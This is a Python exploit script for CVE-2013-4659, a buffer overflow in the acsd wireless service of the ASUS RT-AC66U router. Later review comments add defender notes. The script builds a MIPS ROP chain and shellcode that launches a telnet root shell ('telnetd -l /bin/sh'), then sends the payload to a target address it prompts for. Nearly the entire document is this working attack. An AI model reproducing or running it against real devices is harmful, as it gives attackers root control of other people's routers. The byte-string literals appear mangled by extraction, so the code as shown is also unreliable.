# Title : ASUS RT-AC66U acsd Param - Remote Root Shell Exploit
# Published : 2013-07-27
# Author :
#!/usr/bin/env python
import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
# *Security Analysts @ Independent Security Evaluators
# Software Vendor*********http://asus.com
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
#
def sigHandle(signum, frm):
    """SIGINT handler: announce cleanup, pause one second, then exit with status 0.

    Installed by main() so that Ctrl+C ends the run cleanly.

    Args:
        signum: signal number delivered by the runtime (unused).
        frm: current stack frame at delivery time (unused).
    """
    farewell = "n[!!!] Cleaning up the exploit... [!!!]n"
    print(farewell)
    sleep(1)
    exit(0)
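def targServer():
    """Prompt on stdin until a syntactically valid IPv4 address is entered.

    The text is round-tripped through inet_aton()/inet_ntoa(), so the value
    returned is the normalised dotted-quad form of what was typed.

    Returns:
        The normalised IPv4 address as a string.

    Raises:
        Anything other than a socket ``error`` raised inside the prompt now
        propagates (EOFError on a closed stdin, SystemExit raised by the SIGINT
        handler that main() installs). The original bare ``except:`` caught
        those too, so Ctrl+C or EOF at this prompt re-prompted forever.
    """
    prompt = "n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:nn>"
    while True:
        try:
            # inet_aton() rejects anything that is not a parseable IPv4 address.
            packed = inet_aton(raw_input(prompt))
        except error:
            # Only a malformed address re-prompts; other exceptions propagate.
            print("nn[!!!] Error: Please enter a valid IPv4 address. [!!!]nn")
            sleep(1)
            continue
        return inet_ntoa(packed)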
def main():
    """Entry point: print the banner, prompt for a target, build the payload, send it once.

    Defender's summary, taken from the header comment above: the Broadcom acsd
    wireless channel service on the ASUS RT-AC66U (firmware 3.0.0.4.266, other
    versions untested) listens on TCP/5916 and is reported as CVE-2013-4659, a
    buffer overflow in its ``autochannel``/``param`` command handling. What goes
    on the wire here is one request: the command prefix, several hundred bytes
    of a single repeated filler byte, a ROP chain, and shellcode. A long run of
    one byte value directly after the acsd command prefix on TCP/5916 is the
    observable pattern for a network signature. Mitigation is the vendor
    firmware update referenced in the advisory links in the header.

    NOTE(review): the byte counts quoted in the comments below (510-byte
    filler, 80-byte shellcode) describe the author's original; the escape
    sequences in the string literals as printed on this page look mangled by
    extraction, so the literals as shown do not have those lengths.
    """
    print ("""n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[*] Discovered and Reported: June 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
[*] Software Vendor: http://asus.com
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
[*] Software: acsd wireless service (Listens on TCP/5916)
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659n""")
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    victim = targServer()
    port = int(5916)
    # The command string as printed on this page is mis-encoded (HTML entity
    # rendering of "&param"); the page title names the command as "param".
    acsdCmd = "autochannel¶m=" #Vulnerable command - JH
    # base address of .text section of libc.so.0 in acsd's address space
    # NOTE(review): a fixed libc base means the chain assumes no address
    # randomisation of that mapping on the target; nothing here probes for it.
    libc_base = 0x2ab25000
    # ROP gadget #1
    # lui s0,0x2
    # li a0,1
    # move t9,s1
    # jalr t9
    # ori a1,s0,0x2
    ra1 = struct.pack("<L", libc_base + 0x2d39c)
    # ROP gadget #2
    # move t9,s3
    # lw ra,44(sp)
    # lw s4,40(sp)
    # lw s3,36(sp)
    # lw s2,32(sp)
    # lw s1,28(sp)
    # lw s0,24(sp)
    # jr t9
    s1 = struct.pack("<L", libc_base + 0x34358)
    # sleep() - used to force program context switch (cache flush)
    s3 = struct.pack("<L", libc_base + 0x2cb90)
    # ROP gadget #3
    # addiu a1,sp,24
    # lw gp,16(sp)
    # lw ra,32(sp)
    # jr ra
    # addiu sp,sp,40
    ra2 = struct.pack("<L", libc_base + 0xa1b0)
    # ROP gadget #4
    # move t9,a1
    # addiu a0,a0,56
    # jr t9
    # move a1,a2
    ra3 = struct.pack("<L", libc_base + 0x3167c)
    # jalr sp
    jalr_sp = "x09xf8xa0x03"
    # Filler between the command prefix and the chain; its length is what the
    # overflow relies on, and the repeated byte is the easiest thing to match
    # in captured traffic.
    JuNk = "x42" * 510
    safeNop = "2Aa3"
    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
    #Calling system() and executing telnetd -l /bin/sh
    # Host-side indicator if this succeeds, per the comment above: a telnetd
    # listener started by the acsd process.
    shellcode = "x6cx6ex08x3cx74x65x08x35xecxffxa8"
    shellcode += "xafx64x20x09x3cx65x74x29x35xf0xff"
    shellcode += "xa9xafx20x2fx0ax3cx2dx6cx4ax35xf4"
    shellcode += "xffxaaxafx6ex2fx0bx3cx62x69x6bx35"
    shellcode += "xf8xffxabxafx73x68x0cx24xfcxffxac"
    shellcode += "xafxecxffxa4x23xecxffxbdx23xb4x2a"
    shellcode += "x19x3cx50xf0x39x37x09xf8x20x03x32"
    shellcode += "x41x61x33"
    # Wire payload, in order: command prefix, filler, ROP chain with padding,
    # shellcode. This one buffer is the whole request sent below.
    sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
    sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
    sploit += safeNop + shellcode
    # NOTE(review): every handler below is a bare "except:", which also catches
    # SystemExit (raised by sigHandle on Ctrl+C) and KeyboardInterrupt, then
    # reports them as the stage's error before exiting.
    try:
        print "n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "n [!!!] There was an error creating the network socket. [!!!]nn%sn" % exc_info()
        sleep(1)
        exit(0)
    try:
        print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "n [!!!] There was an error connecting to %s. [!!!]nn%sn" % (victim, exc_info())
        sleep(1)
        exit(0)
    try:
        print """ [*] Attempting to exploit the acsd param command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        # Single send; nothing is read back, so the script cannot tell whether
        # the service crashed, ignored the request, or ran the payload.
        net_sock.send(sploit)
        sleep(1)
    except:
        print "n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]nn%sn" % (victim, exc_info())
        sleep(1)
        exit(0)
    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.n"""
        net_sock.close()
    except:
        print "n [!!!] There was an error closing the network socket. [!!!]nn%sn" % exc_info()
        sleep(1)
        exit(0)
if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()